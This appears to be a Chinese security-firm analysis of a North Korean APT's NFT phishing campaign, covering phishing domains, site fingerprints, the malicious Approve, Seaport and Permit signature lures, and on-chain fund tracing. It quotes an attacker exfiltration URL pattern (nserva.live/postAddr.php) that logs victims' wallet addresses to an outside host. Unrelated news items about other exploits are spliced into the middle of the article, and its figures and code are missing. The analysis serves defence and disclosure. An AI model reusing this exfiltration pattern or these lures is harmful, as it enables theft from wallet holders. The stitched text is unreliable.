NFT:慢霧：朝鮮APT組織對NFT用戶大規模釣魚事件分析_NIM

背景

9月2日，慢霧安全團隊發現疑似APT團伙針對加密生態的NFT用戶進行大規模釣魚活動，并發布了《“零元購”NFT釣魚分析》。9月4日，推特用戶PhantomX發推稱朝鮮APT組織針對數十個ETH和SOL項目進行大規模的網絡釣魚活動。

該推特用戶給出了196個釣魚域名信息，分析后關聯到朝鮮黑客相關信息，具體的域名列表如下：

慢霧安全團隊注意到該事件并第一時間跟進深入分析：

由于朝鮮黑客針對加密貨幣行業的攻擊模型多樣化，我們披露的也只是冰山一角，因為一些保密的要求，本篇文章也僅針對其中一部分釣魚素材包括相關釣魚錢包地址進行分析。這里將重點針對NFT釣魚進行分析。釣魚網站分析

經過深入分析，發現此次釣魚的其中一種方式是發布虛假NFT相關的、帶有惡意Mint的誘餌網站，這些NFT在OpenSea、X2Y2和Rarible等平臺上都有出售。此次APT組織針對Crypto和NFT用戶的釣魚涉及將近500多個域名。查詢這些域名的注冊相關信息，發現注冊日期最早可追溯到7個月前：

慢霧：Distrust發現嚴重漏洞，影響使用Libbitcoin Explorer3.x版本的加密錢包:金色財經報道，據慢霧區消息，Distrust 發現了一個嚴重的漏洞，影響了使用 Libbitcoin Explorer 3.x 版本的加密貨幣錢包。該漏洞允許攻擊者通過破解 Mersenne Twister 偽隨機數生成器（PRNG）來訪問錢包的私鑰，目前已在現實世界中造成了實際影響。

漏洞詳情：該漏洞源于 Libbitcoin Explorer 3.x 版本中的偽隨機數生成器（PRNG）實現。該實現使用了 Mersenne Twister 算法，并且僅使用了 32 位的系統時間作為種子。這種實現方式使得攻擊者可以通過暴力破解方法在幾天內找到用戶的私鑰。

影響范圍：該漏洞影響了所有使用 Libbitcoin Explorer 3.x 版本生成錢包的用戶，以及使用 libbitcoin-system 3.6 開發庫的應用。

已知受影響的加密貨幣包括 Bitcoin、Ethereum、Ripple、Dogecoin、Solana、Litecoin、Bitcoin Cash 和 Zcash 等。

風險評估：由于該漏洞的存在，攻擊者可以訪問并控制用戶的錢包，從而竊取其中的資金。截至 2023 年 8 月，已有超過 $900,000 美元的加密貨幣資產被盜。

解決方案：我們強烈建議所有使用 Libbitcoin Explorer 3.x 版本的用戶立即停止使用受影響的錢包，并將資金轉移到安全的錢包中。請務必使用經過驗證的、安全的隨機數生成方法來生成新的錢包。[2023/8/10 16:18:20]

慢霧：過去一周Web3生態系統因安全事件損失近160萬美元:6月26日消息，慢霧發推稱，過去一周Web3生態系統因安全事件損失近160萬美元，包括MidasCapital、Ara、VPANDADAO、Shido、Slingshot、IPO、Astaria。[2023/6/26 22:00:21]

同時我們也發現朝鮮黑客常使用的一些獨有的釣魚特征：特征一：釣魚網站都會記錄訪客數據并保存到外部站點。黑客通過HTTPGET請求將站點訪問者信息記錄到外部域，發送請求的域名雖不同但是請求的API接口都為“/postAddr.php”。一般格式為“https://nserva.live/postAddr.php?mmAddr=......&accessTime=xxx&url=evil.site”，其中參數mmAddr記錄訪客的錢包地址，accessTime記錄訪客的訪問時間，url記錄訪客當前所訪問的釣魚網站鏈接。

特征二：釣魚網站會請求一個NFT項目價目表，通常HTTP的請求路徑為“getPriceData.php”：

慢霧：NimbusPlatform遭遇閃電貸攻擊，損失278枚BNB:據慢霧安全團隊情報，2022 年 12 月 14 日， BSC 鏈上的NimbusPlatform項目遭到攻擊，攻擊者獲利約278枚BNB。慢霧安全團隊以簡訊的形式分享如下：

1. 攻擊者首先在 8 天前執行了一筆交易（0x7d2d8d），把 20 枚 BNB 換成 NBU_WBNB 再換成 GNIMB 代幣，然后把 GNIMB 代幣轉入 Staking 合約作質押，為攻擊作準備；

2. 在 8 天后正式發起攻擊交易（0x42f56d3），首先通過閃電貸借出 75477 枚 BNB 并換成 NBU_WBNB，然后再用這些 NBU_WBNB 代幣將池子里的絕大部分 NIMB 代幣兌換出；

3. 接著調用 Staking 合約的 getReward 函數進行獎勵的提取，獎勵的計算是和 rate 的值正相關的，而 rate 的值則取決于池子中 NIMB 代幣和 GNIMB 代幣的價格，由于 NIMB 代幣的價格是根據上一步閃電貸中被操控的池子中的代幣數量來計算的，導致其由于閃電貸兌換出大量的代幣而變高，最后計算的獎勵也會更多；

4. 攻擊者最后將最后獲得的 GNIMB 代幣和擁有的 NIMB 代幣換成 NBU_WBNB 代幣后再換成 BNB，歸還閃電貸獲利；

此次攻擊的主要原因在于計算獎勵的時候僅取決于池子中的代幣數量導致被閃電貸操控，從而獲取比預期更多的獎勵。慢霧安全團隊建議在進行代幣獎計算時應確保價格來源的安全性。[2022/12/14 21:44:29]

特征三：存在一個鏈接圖像到目標項目的文件“imgSrc.js”，包含目標站點列表和在其相應網絡釣魚站點上使用的圖像文件的托管位置，這個文件可能是釣魚網站模板的一部分。

慢霧：攻擊者系通過“supply()”函數重入Lendf.Me合約 實現重入攻擊:慢霧安全團隊發文跟進“DeFi平臺Lendf.Me被黑”一事的具體原因及防御建議。文章分析稱，通過將交易放在bloxy.info上查看完整交易流程，可發現攻擊者對Lendf.Me進行了兩次“supply()”函數的調用，但是這兩次調用都是獨立的，并不是在前一筆“supply()”函數中再次調用“supply()”函數。緊接著，在第二次“supply()”函數的調用過程中，攻擊者在他自己的合約中對Lendf.Me的“withdraw()”函數發起調用，最終提現。慢霧安全團隊表示，不難分析出，攻擊者的“withdraw()”調用是發生在transferFrom函數中，也就是在Lendf.Me通過transferFrom調用用戶的“tokensToSend()”鉤子函數的時候調用的。很明顯，攻擊者通過“supply()”函數重入了Lendf.Me合約，造成了重入攻擊。[2020/4/19]

進一步分析發現APT用于監控用戶請求的主要域名為“thedoodles.site”，此域名在APT活動早期主要用來記錄用戶數據：

慢霧：Let's Encrypt軟件Bug導致3月4日吊銷 300 萬個證書:Let's Encrypt由于在后端代碼中出現了一個錯誤，Let's Encrypt項目將在撤銷超過300萬個TLS證書。詳情是該錯誤影響了Boulder，Let's Encrypt項目使用該服務器軟件在發行TLS證書之前驗證用戶及其域。慢霧安全團隊提醒：數字貨幣行業有不少站點或內部系統為安全目的而使用 Let's Encrypt 自簽證書，請及時確認是否受到影響。如有影響請及時更新證書，以免造成不可預知的風險。用戶可查看原文鏈接在線驗證證書是否受到影響。[2020/3/4]

查詢該域名的HTTPS證書啟用時間是在7個月之前，黑客組織已經開始實施對NFT用戶對攻擊。

最后來看下黑客到底運行和部署了多少個釣魚站點：比如最新的站點偽裝成世界杯主題：

繼續根據相關的HTTPS證書搜索得到相關的網站主機信息：

在一些主機地址中發現了黑客使用的各種攻擊腳本和統計受害者信息的txt文件。

這些文件記錄了受害者訪問記錄、授權情況、使用插件錢包的情況：

可以發現這些信息跟釣魚站點采集的訪客數據相吻合。其中還包括受害者approve記錄：

以及簽名數據sigData等，由于比較敏感此處不進行展示。另外，統計發現主機相同IP下NFT釣魚站群，單獨一個IP下就有372個NFT釣魚站點：

另一個IP下也有320個NFT釣魚站群：

甚至包括朝鮮黑客在經營的一個DeFi平臺：

由于篇幅有限，此處不再贅述。釣魚手法分析

結合之前《NFT零元購釣魚》文章，我們對此次釣魚事件的核心代碼進行了分析。我們發現黑客釣魚涉及到WETH、USDC、DAI、UNI等多個地址協議。

下面代碼用于誘導受害者進行授權NFT、ERC20等較常見的釣魚Approve操作：

除此之外，黑客還會誘導受害者進行Seaport、Permit等簽名。

下面是這種簽名的正常樣例，只是在釣魚網站中不是“opensea.io”這個域名。

我們在黑客留下的主機也發現了這些留存的簽名數據和“Seaport”的簽名數據特征一致。

由于這類型的簽名請求數據可以“離線存儲”，黑客在拿到大量的受害者簽名數據后批量化的上鏈轉移資產。MistTrack分析

對釣魚網站及手法分析后，我們選取其中一個釣魚地址進行分析。可以看到這個地址已被MistTrack標記為高風險釣魚地址，交易數也還挺多。釣魚者共收到1055個NFT，售出后獲利近300ETH。

往上溯源，該地址的初始資金來源于地址轉入的4.97ETH。往下溯源，則發現該地址有與其他被MistTrack標記為風險的地址有交互，以及有5.7ETH轉入了FixedFloat。

再來分析下初始資金來源地址，目前收到約6.5ETH。初始資金來源于Binance轉入的1.433ETH。

同時，該地址也是與多個風險地址進行交互。

總結

由于保密性和隱私性，本文僅針對其中一部分NFT釣魚素材進行分析，并提煉出朝鮮黑客的部分釣魚特征，當然，這只是冰山一角。慢霧在此建議，用戶需加強對安全知識的了解，進一步強化甄別網絡釣魚攻擊的能力等，避免遭遇此類攻擊。更多的安全知識建議閱讀慢霧出品的《區塊鏈黑暗森林自救手冊》。Ps.感謝hip、ScamSniffer提供的支持。相關鏈接：https://www.prevailion.com/what-wicked-webs-we-unweavehttps://twitter.com/PhantomXSec/status/1566219671057371136https://twitter.com/evilcos/status/1603969894965317632原地址

Tags：NFTCOINNIMBNIMNFTL價格KevacoinNIMBUS幣UniMex Network

POL幣最新價格